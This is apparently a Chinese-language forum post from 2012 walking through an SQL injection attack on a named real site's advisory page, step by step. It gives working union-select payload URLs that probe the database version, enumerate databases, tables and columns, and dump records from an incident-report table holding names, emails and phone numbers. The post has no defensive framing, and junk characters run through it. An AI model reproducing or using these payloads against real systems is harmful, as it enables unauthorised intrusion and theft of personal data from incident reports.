1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
D3 o3 Y: i% o2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解# ?! T# L' ]$ M* B
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
9 ]# v; j9 S$ S' W3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--; K, ^' n9 A2 ^( C! J: y
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
. f$ ^0 s* q( I' F2 y2 H" B4.判断有没有写权限
* R" t7 u/ ] yhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限1 F9 a2 N0 a' l, h. i% P+ ~
没办法,手动猜表啦& Q5 R) e2 v5 F5 {' X
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,11 E3 o' c7 m" E2 m# s, c5 K
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
% Q- e$ e; A, b3 t# _% e' m+ Dhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
1 N4 j# S9 M o5 F成功查出所有数据库,国外的黑客就是不一般。数据库如下:8 L: U" Y0 |. q0 M2 I0 Y
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
' B" u( U- _+ s2 D) D6.爆表,爆的是twcert库
+ ]( `8 m7 j3 chttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--* _6 j# J( U" N& A& K+ M9 g) ^; v; `: v
爆出如下表' I9 B/ @* V" y9 `
downloadfile,irsys,newsdata,secrpt,secrpt_big5
7 j* D1 c% o6 e) Z" l7.爆列名,这次爆的是irsys表
) }$ y8 H2 I( Rhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
! A- w9 [% I! j. |2 K7 J Y爆出如下列
6 Y3 y5 \9 |0 k7 Nir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
2 v# Z% s5 @6 M5 s( \+ D P$ N8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。* k% @8 A1 T" g: V6 R; \
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--7 p6 t( v9 B& P
返回是3,说明每个列里有3个地段. s+ R% w6 Z4 p, Y9 ~
9.爆字段内容: w$ o2 A9 v! s; X; U+ v8 c
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
- V+ v8 [& i4 h/ X! j. Z0 E爆出name列的第一个字段的内容
/ ^/ `! P( C% X$ y7 `, K5 Ghttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--# z# X# A1 S7 A o- E' ~
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对